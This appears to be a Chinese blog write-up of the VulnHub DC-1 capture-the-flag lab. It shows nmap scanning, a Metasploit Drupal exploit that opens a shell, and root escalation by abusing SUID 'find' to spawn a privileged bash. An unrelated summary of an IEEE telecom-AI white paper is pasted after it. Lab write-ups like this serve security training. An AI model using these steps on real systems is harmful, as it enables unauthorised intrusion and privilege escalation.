DC-1打靶思路详解(vulnhub)

本文详细描述了在Vulnhub靶机DC-1上进行信息收集、Web渗透(利用Drupal漏洞)和后渗透(SUID提权)的过程,展示了如何通过Nmap扫描和Metasploit进行攻击并寻找提权机会。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DC-1打靶思路详解(vulnhub)

第一步:信息收集

nmap -sn 192.168.31.0/24 

在这里插入图片描述

确定靶机IP为192.168.31.61

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.61

结果如下

在这里插入图片描述

第二步:WEB渗透

直接访问 http://192.168.31.61/

在这里插入图片描述

哦!!!好熟悉 之前在做 lampiao 这个靶机的时候碰到过

那我们直接上 msf

msfconsole  

search drupal

use 1

set RHOSTS 192.168.31.61

run

在这里插入图片描述

成功!!!

第三步:后渗透

直接通过msf进行后渗透

进入交互环境

shell

然后用python增强交互环境

python -c "import pty;pty.spawn('/bin/bash')"

查看环境,看看能不能用脏牛进行提权

uname -a

gcc -v

好像可以,但经过尝试发现不行

那就看看是否可以通过利用SUID提权

find / -user root -perm -4000 -exec ls -ldb {} \;
find: 用于在文件系统中搜索文件和目录。
/: 表示从根目录开始进行搜索。
-user root: 搜索属主为root的文件。
-perm -4000: 搜索具有SetUID权限的文件。
-exec: 在找到的每个文件上执行指定的命令。
ls -ldb {} \;: 执行ls -ldb命令来显示找到的文件的详细信息。{}表示当前找到的文件,\;表示命令的结束。

在这里插入图片描述

发现有 find 那就可以进行提权,查看flag

find / -exec /bin/bash -p \;
必须要有-p参数 

官方解释:
-p 只要真实用户 ID 和有效用户 ID 不匹配时就会被打开 

个人理解:因为使用 find 执行 /bin/bash 真实用户 ID 是 www-data 用户,而有效 ID 是 root 所以会打开一个特权 shell

在这里插入图片描述

至此完结,撒花。

内容概要:该白皮书由IEEE发布,聚焦于电信领域大规模AI(尤其是大型电信模型,即LTMs)的发展,旨在为电信行业向6G演进提供创新解决方案。白皮书首先介绍了生成式AI在电信领域的应用潜力,强调其在实时网络编排、智能决策和自适应配置等方面的重要性。随后,详细探讨了LTMs的架构设计、部署策略及其在无线接入网(RAN)与核心网中的具体应用,如资源分配、频谱管理、信道建模等。此外,白皮书还讨论了支持LTMs的数据集、硬件要求、评估基准以及新兴应用场景,如基于边缘计算的分布式框架、联邦学习等。最后,白皮书关注了监管和伦理挑战,提出了数据治理和问责制作为确保LTMs可信运行的关键因素。 适合人群:对电信行业及AI技术感兴趣的科研人员、工程师及相关从业者。 使用场景及目标:①理解大规模AI在电信领域的应用现状和发展趋势;②探索如何利用LTMs解决电信网络中的复杂问题,如资源优化、频谱管理等;③了解LTMs在硬件要求、数据集、评估基准等方面的最新进展;④掌握应对LTMs带来的监管和伦理挑战的方法。 其他说明:白皮书不仅提供了理论和技术层面的深度剖析,还结合了大量实际案例和应用场景,为读者提供了全面的参考依据。建议读者结合自身背景,重点关注感兴趣的具体章节,如特定技术实现或应用案例,并参考提供的文献链接进行深入研究。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值